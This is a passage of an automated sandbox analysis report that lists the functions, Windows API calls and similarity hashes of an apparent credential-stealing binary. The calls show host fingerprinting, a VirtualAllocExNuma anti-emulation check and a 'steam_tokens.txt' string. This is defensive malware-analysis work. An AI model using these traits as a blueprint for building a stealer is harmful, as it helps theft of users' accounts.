                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                          • String ID: 5\A
                                                                                          • API String ID: 2104210347-3392445751
                                                                                          • Opcode ID: e73a277ec495b34ed2bd4af22877a3a9feb46bd0b7d201f2f977525177bc6704
                                                                                          • Instruction ID: 53e7b7cde32fa2def73dba0ef3da04c4d4f6f11e0d96676858e1097c5765331f
                                                                                          • Opcode Fuzzy Hash: e73a277ec495b34ed2bd4af22877a3a9feb46bd0b7d201f2f977525177bc6704
                                                                                          • Instruction Fuzzy Hash: 1441EBB660010467CB64FB64EC83EEE333DAB84304F40855EB94997191ED795ACD8BE6
                                                                                          Function 00417380 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
                                                                                          • GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocComputerNameProcess
                                                                                          • String ID:
                                                                                          • API String ID: 4203777966-0
                                                                                          • Opcode ID: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
                                                                                          • Instruction ID: 42712b1d228129e2e67f3f866f9c43061177fb5da2658b34d54d74d13c44c576
                                                                                          • Opcode Fuzzy Hash: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
                                                                                          • Instruction Fuzzy Hash: BC0181B1A08608EBC710CF99DD45BEEBBB8FB04721F20021AF905E3690D7785945CBA5
                                                                                          Function 00418F10 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00418F24
                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00418F45
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418F4F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3183270410-0
                                                                                          • Opcode ID: 904f881645263b8d6980a0d5e63786ab633fa25ddeb60b9bffeff93c14b2dbd8
                                                                                          • Instruction ID: 429e76ffcb292cc7325fe34a8c967f3e8a19cc1fb06d1469951f90a9fbb0bdee
                                                                                          • Opcode Fuzzy Hash: 904f881645263b8d6980a0d5e63786ab633fa25ddeb60b9bffeff93c14b2dbd8
                                                                                          • Instruction Fuzzy Hash: 29F05E74A0020CFBDB14DFA4DD4AFEE7779AB08700F004498BB0997290D6B0AE85CB94
                                                                                          Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004164BC), ref: 0040112B
                                                                                          • VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
                                                                                          • ExitProcess.KERNEL32 ref: 00401143
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1103761159-0
                                                                                          • Opcode ID: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
                                                                                          • Instruction ID: 0e2e6d3d2f445679f77a7861b9af8e0e8f55b174cdb9f0aa425208459b8dc1b3
                                                                                          • Opcode Fuzzy Hash: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
                                                                                          • Instruction Fuzzy Hash: 3DE08670945308FBE7205FA09C0AB4D76689B04B05F105056F708BA1E0C6B82501865C
                                                                                          Function 00411520 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 00416FA0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00416FE2
                                                                                            • Part of subcall function 00416FA0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
                                                                                            • Part of subcall function 00416FA0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004170A3
                                                                                            • Part of subcall function 00416FA0: HeapAlloc.KERNEL32(00000000), ref: 004170AA
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 00417130: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417144
                                                                                            • Part of subcall function 00417130: HeapAlloc.KERNEL32(00000000), ref: 0041714B
                                                                                            • Part of subcall function 00417260: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041D5B0,000000FF,?,004117A9,00000000,?,0081B6B8,00000000,?), ref: 00417292
                                                                                            • Part of subcall function 00417260: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041D5B0,000000FF,?,004117A9,00000000,?,0081B6B8,00000000,?), ref: 00417299
                                                                                            • Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
                                                                                            • Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
                                                                                            • Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
                                                                                            • Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
                                                                                            • Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
                                                                                            • Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
                                                                                            • Part of subcall function 00417420: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DD0,00000000,?), ref: 00417450
                                                                                            • Part of subcall function 00417420: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DD0,00000000,?), ref: 00417457
                                                                                            • Part of subcall function 00417420: GetLocalTime.KERNEL32(?,?,?,?,?,00420DD0,00000000,?), ref: 00417464
                                                                                            • Part of subcall function 00417420: wsprintfA.USER32 ref: 00417493
                                                                                            • Part of subcall function 004174D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0081AD90,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 00417503
                                                                                            • Part of subcall function 004174D0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,0081AD90,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041750A
                                                                                            • Part of subcall function 004174D0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0081AD90,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041751D
                                                                                            • Part of subcall function 004175A0: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0081AD90,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 004175D5
                                                                                            • Part of subcall function 00417630: GetKeyboardLayoutList.USER32(00000000,00000000,0042059F), ref: 00417681
                                                                                            • Part of subcall function 00417630: LocalAlloc.KERNEL32(00000040,?), ref: 00417699
                                                                                            • Part of subcall function 00417630: GetKeyboardLayoutList.USER32(?,00000000), ref: 004176AD
                                                                                            • Part of subcall function 00417630: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417702
                                                                                            • Part of subcall function 00417630: LocalFree.KERNEL32(00000000), ref: 004177C2
                                                                                            • Part of subcall function 00417820: GetSystemPowerStatus.KERNEL32(?), ref: 0041784D
                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,0081B858,00000000,?,00420DF4,00000000,?,00000000,00000000,?,0081ADC0,00000000,?,00420DF0,00000000), ref: 00411B8E
                                                                                            • Part of subcall function 00418F10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00418F24
                                                                                            • Part of subcall function 00418F10: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00418F45
                                                                                            • Part of subcall function 00418F10: CloseHandle.KERNEL32(00000000), ref: 00418F4F
                                                                                            • Part of subcall function 004178A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178D7
                                                                                            • Part of subcall function 004178A0: HeapAlloc.KERNEL32(00000000), ref: 004178DE
                                                                                            • Part of subcall function 004178A0: RegOpenKeyExA.KERNEL32(80000002,007F6220,00000000,00020119,?), ref: 004178FE
                                                                                            • Part of subcall function 004178A0: RegQueryValueExA.KERNEL32(?,0081B678,00000000,00000000,000000FF,000000FF), ref: 0041791F
                                                                                            • Part of subcall function 004178A0: RegCloseKey.ADVAPI32(?), ref: 00417932
                                                                                            • Part of subcall function 00417A00: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00417A69
                                                                                            • Part of subcall function 00417A00: GetLastError.KERNEL32 ref: 00417A78
                                                                                            • Part of subcall function 00417970: GetSystemInfo.KERNEL32(00420DFC), ref: 004179A0
                                                                                            • Part of subcall function 00417970: wsprintfA.USER32 ref: 004179B6
                                                                                            • Part of subcall function 00417BA0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0081AE08,00000000,?,00420DFC,00000000,?,00000000), ref: 00417BD0
                                                                                            • Part of subcall function 00417BA0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0081AE08,00000000,?,00420DFC,00000000,?,00000000,00000000), ref: 00417BD7
                                                                                            • Part of subcall function 00417BA0: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00417BF8
                                                                                            • Part of subcall function 00417BA0: __aulldiv.LIBCMT ref: 00417C12
                                                                                            • Part of subcall function 00417BA0: __aulldiv.LIBCMT ref: 00417C20
                                                                                            • Part of subcall function 00417BA0: wsprintfA.USER32 ref: 00417C4C
                                                                                            • Part of subcall function 00418260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DF8,00000000,?), ref: 004182CF
                                                                                            • Part of subcall function 00418260: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DF8,00000000,?), ref: 004182D6
                                                                                            • Part of subcall function 00418260: wsprintfA.USER32 ref: 004182F0
                                                                                            • Part of subcall function 00417DC0: RegOpenKeyExA.KERNEL32(00000000,00818B78,00000000,00020019,00000000,004205A6), ref: 00417E44
                                                                                            • Part of subcall function 00417DC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
                                                                                            • Part of subcall function 00417DC0: wsprintfA.USER32 ref: 00417EF9
                                                                                            • Part of subcall function 00417DC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
                                                                                            • Part of subcall function 00417DC0: RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
                                                                                            • Part of subcall function 00417DC0: RegCloseKey.ADVAPI32(00000000), ref: 00417F39
                                                                                            • Part of subcall function 00418120: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041816A
                                                                                            • Part of subcall function 00418120: Process32First.KERNEL32(?,00000128), ref: 0041817E
                                                                                            • Part of subcall function 00418120: Process32Next.KERNEL32(?,00000128), ref: 00418193
                                                                                            • Part of subcall function 00418120: CloseHandle.KERNEL32(?), ref: 00418201
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041216B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
                                                                                          • String ID:
                                                                                          • API String ID: 2204142833-0
                                                                                          • Opcode ID: efd4dc239b49fb99bbfd1069c0ac1cdb45bec6c13a269f84b0dddfaf1f80abb9
                                                                                          • Instruction ID: a9f6d0abc10a802bc737c54d14ff6b9d5e6ee0272f4c656d6212d3eaa4757419
                                                                                          • Opcode Fuzzy Hash: efd4dc239b49fb99bbfd1069c0ac1cdb45bec6c13a269f84b0dddfaf1f80abb9
                                                                                          • Instruction Fuzzy Hash: 8472A071851018AACB19FB91DC96EDEB33CAF24314F5042DFB51762051EF782B98CB6A
                                                                                          Function 00406C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00406CEF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID: @
                                                                                          • API String ID: 544645111-2766056989
                                                                                          • Opcode ID: 867edc3f7feb9bd756791c0b70ce9cc7864d6ccfd6d1b0176bf07496b986d28b
                                                                                          • Instruction ID: a97aeec014860b7bcefe5a819602e0a11eb2ce5ea612e9d10357849f9a661301
                                                                                          • Opcode Fuzzy Hash: 867edc3f7feb9bd756791c0b70ce9cc7864d6ccfd6d1b0176bf07496b986d28b
                                                                                          • Instruction Fuzzy Hash: 3E213174A04208EFEB04CF89D544BAEBBB1FF48304F1181AAD456AB381D3799A91DF85
                                                                                          Function 00406D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f8b28877c224b251f10175a9abca519b7fa48fc2f12a49a1c36a71eedd802e18
                                                                                          • Instruction ID: 456806d1e879ecad470b616e27b80e03465aa0a519357bc85acbc9acecad2077
                                                                                          • Opcode Fuzzy Hash: f8b28877c224b251f10175a9abca519b7fa48fc2f12a49a1c36a71eedd802e18
                                                                                          • Instruction Fuzzy Hash: 116127B4900209DFCB14DF94E944BEEB7B0BB48304F1185AAE80677380D779AEA5DF95
                                                                                          Function 00414BE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00816A50,?,004210DC,?,00000000), ref: 0041A1FB
                                                                                            • Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00420AB3,?,?,?,?,?,?,00415BEB,?), ref: 00414C0A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpylstrlen
                                                                                          • String ID: steam_tokens.txt
                                                                                          • API String ID: 2001356338-401951677
                                                                                          • Opcode ID: 31e308a2702a12bc628887caaa0b1201e0d349a909a28e03d21d8c8f8041e4fb
                                                                                          • Instruction ID: 43ba9c4e7b772c09295c3d1ddd3f4580462a4fb142283e9dc1187fbec7936fd0
                                                                                          • Opcode Fuzzy Hash: 31e308a2702a12bc628887caaa0b1201e0d349a909a28e03d21d8c8f8041e4fb
                                                                                          • Instruction Fuzzy Hash: 48F01271D1110876CB04F7B2EC579ED733CAE54358F90426EF41662092EF78665886AB
                                                                                          Function 00417970 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
